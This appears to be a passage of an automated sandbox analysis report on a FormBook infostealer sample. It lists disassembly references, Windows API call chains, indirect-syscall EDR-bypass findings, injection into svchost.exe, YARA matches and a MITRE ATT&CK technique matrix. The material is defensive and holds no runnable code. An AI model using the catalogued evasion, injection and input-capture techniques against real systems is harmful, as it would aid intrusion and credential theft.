Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396E443 mov eax, dword ptr fs:[00000030h]	9_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395A470 mov eax, dword ptr fs:[00000030h]	9_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395A470 mov eax, dword ptr fs:[00000030h]	9_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395A470 mov eax, dword ptr fs:[00000030h]	9_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BC460 mov ecx, dword ptr fs:[00000030h]	9_2_039BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940BBE mov eax, dword ptr fs:[00000030h]	9_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940BBE mov eax, dword ptr fs:[00000030h]	9_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	9_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	9_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DEBD0 mov eax, dword ptr fs:[00000030h]	9_2_039DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03950BCB mov eax, dword ptr fs:[00000030h]	9_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03950BCB mov eax, dword ptr fs:[00000030h]	9_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03950BCB mov eax, dword ptr fs:[00000030h]	9_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930BCD mov eax, dword ptr fs:[00000030h]	9_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930BCD mov eax, dword ptr fs:[00000030h]	9_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930BCD mov eax, dword ptr fs:[00000030h]	9_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938BF0 mov eax, dword ptr fs:[00000030h]	9_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938BF0 mov eax, dword ptr fs:[00000030h]	9_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938BF0 mov eax, dword ptr fs:[00000030h]	9_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395EBFC mov eax, dword ptr fs:[00000030h]	9_2_0395EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BCBF0 mov eax, dword ptr fs:[00000030h]	9_2_039BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AEB1D mov eax, dword ptr fs:[00000030h]	9_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04B00 mov eax, dword ptr fs:[00000030h]	9_2_03A04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395EB20 mov eax, dword ptr fs:[00000030h]	9_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395EB20 mov eax, dword ptr fs:[00000030h]	9_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F8B28 mov eax, dword ptr fs:[00000030h]	9_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F8B28 mov eax, dword ptr fs:[00000030h]	9_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03928B50 mov eax, dword ptr fs:[00000030h]	9_2_03928B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DEB50 mov eax, dword ptr fs:[00000030h]	9_2_039DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E4B4B mov eax, dword ptr fs:[00000030h]	9_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E4B4B mov eax, dword ptr fs:[00000030h]	9_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C6B40 mov eax, dword ptr fs:[00000030h]	9_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C6B40 mov eax, dword ptr fs:[00000030h]	9_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FAB40 mov eax, dword ptr fs:[00000030h]	9_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D8B42 mov eax, dword ptr fs:[00000030h]	9_2_039D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392CB7E mov eax, dword ptr fs:[00000030h]	9_2_0392CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A02B57 mov eax, dword ptr fs:[00000030h]	9_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A02B57 mov eax, dword ptr fs:[00000030h]	9_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A02B57 mov eax, dword ptr fs:[00000030h]	9_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A02B57 mov eax, dword ptr fs:[00000030h]	9_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03968A90 mov edx, dword ptr fs:[00000030h]	9_2_03968A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393EA80 mov eax, dword ptr fs:[00000030h]	9_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04A80 mov eax, dword ptr fs:[00000030h]	9_2_03A04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938AA0 mov eax, dword ptr fs:[00000030h]	9_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03938AA0 mov eax, dword ptr fs:[00000030h]	9_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03986AA4 mov eax, dword ptr fs:[00000030h]	9_2_03986AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930AD0 mov eax, dword ptr fs:[00000030h]	9_2_03930AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03964AD0 mov eax, dword ptr fs:[00000030h]	9_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03964AD0 mov eax, dword ptr fs:[00000030h]	9_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03986ACC mov eax, dword ptr fs:[00000030h]	9_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03986ACC mov eax, dword ptr fs:[00000030h]	9_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03986ACC mov eax, dword ptr fs:[00000030h]	9_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396AAEE mov eax, dword ptr fs:[00000030h]	9_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396AAEE mov eax, dword ptr fs:[00000030h]	9_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BCA11 mov eax, dword ptr fs:[00000030h]	9_2_039BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03954A35 mov eax, dword ptr fs:[00000030h]	9_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03954A35 mov eax, dword ptr fs:[00000030h]	9_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396CA38 mov eax, dword ptr fs:[00000030h]	9_2_0396CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396CA24 mov eax, dword ptr fs:[00000030h]	9_2_0396CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395EA2E mov eax, dword ptr fs:[00000030h]	9_2_0395EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03936A50 mov eax, dword ptr fs:[00000030h]	9_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940A5B mov eax, dword ptr fs:[00000030h]	9_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03940A5B mov eax, dword ptr fs:[00000030h]	9_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039ACA72 mov eax, dword ptr fs:[00000030h]	9_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039ACA72 mov eax, dword ptr fs:[00000030h]	9_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396CA6F mov eax, dword ptr fs:[00000030h]	9_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396CA6F mov eax, dword ptr fs:[00000030h]	9_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396CA6F mov eax, dword ptr fs:[00000030h]	9_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DEA60 mov eax, dword ptr fs:[00000030h]	9_2_039DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B89B3 mov esi, dword ptr fs:[00000030h]	9_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B89B3 mov eax, dword ptr fs:[00000030h]	9_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B89B3 mov eax, dword ptr fs:[00000030h]	9_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039429A0 mov eax, dword ptr fs:[00000030h]	9_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039309AD mov eax, dword ptr fs:[00000030h]	9_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039309AD mov eax, dword ptr fs:[00000030h]	9_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039649D0 mov eax, dword ptr fs:[00000030h]	9_2_039649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FA9D3 mov eax, dword ptr fs:[00000030h]	9_2_039FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C69C0 mov eax, dword ptr fs:[00000030h]	9_2_039C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039629F9 mov eax, dword ptr fs:[00000030h]	9_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039629F9 mov eax, dword ptr fs:[00000030h]	9_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BE9E0 mov eax, dword ptr fs:[00000030h]	9_2_039BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BC912 mov eax, dword ptr fs:[00000030h]	9_2_039BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03928918 mov eax, dword ptr fs:[00000030h]	9_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03928918 mov eax, dword ptr fs:[00000030h]	9_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE908 mov eax, dword ptr fs:[00000030h]	9_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AE908 mov eax, dword ptr fs:[00000030h]	9_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B892A mov eax, dword ptr fs:[00000030h]	9_2_039B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039C892B mov eax, dword ptr fs:[00000030h]	9_2_039C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B0946 mov eax, dword ptr fs:[00000030h]	9_2_039B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A04940 mov eax, dword ptr fs:[00000030h]	9_2_03A04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D4978 mov eax, dword ptr fs:[00000030h]	9_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D4978 mov eax, dword ptr fs:[00000030h]	9_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BC97C mov eax, dword ptr fs:[00000030h]	9_2_039BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03956962 mov eax, dword ptr fs:[00000030h]	9_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03956962 mov eax, dword ptr fs:[00000030h]	9_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03956962 mov eax, dword ptr fs:[00000030h]	9_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0397096E mov eax, dword ptr fs:[00000030h]	9_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0397096E mov edx, dword ptr fs:[00000030h]	9_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0397096E mov eax, dword ptr fs:[00000030h]	9_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BC89D mov eax, dword ptr fs:[00000030h]	9_2_039BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03930887 mov eax, dword ptr fs:[00000030h]	9_2_03930887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395E8C0 mov eax, dword ptr fs:[00000030h]	9_2_0395E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A008C0 mov eax, dword ptr fs:[00000030h]	9_2_03A008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	9_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FA8E4 mov eax, dword ptr fs:[00000030h]	9_2_039FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039BC810 mov eax, dword ptr fs:[00000030h]	9_2_039BC810

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B11361
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B14C7B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CBF008

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\I3LPkQh2an.exe"

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: I3LPkQh2an.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: I3LPkQh2an.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1738864587.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1740236285.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: I3LPkQh2an.exe	Binary or memory string: WIN_81
Source: I3LPkQh2an.exe	Binary or memory string: WIN_XP
Source: I3LPkQh2an.exe	Binary or memory string: WIN_XPe
Source: I3LPkQh2an.exe	Binary or memory string: WIN_VISTA
Source: I3LPkQh2an.exe	Binary or memory string: WIN_7
Source: I3LPkQh2an.exe	Binary or memory string: WIN_8
Source: I3LPkQh2an.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1738864587.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1740236285.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 LSASS Driver	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	1 DLL Side-Loading	3 Obfuscated Files or Information	NTDS	125 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Valid Accounts	1 Software Packing	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Access Token Manipulation	1 Timestomp	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
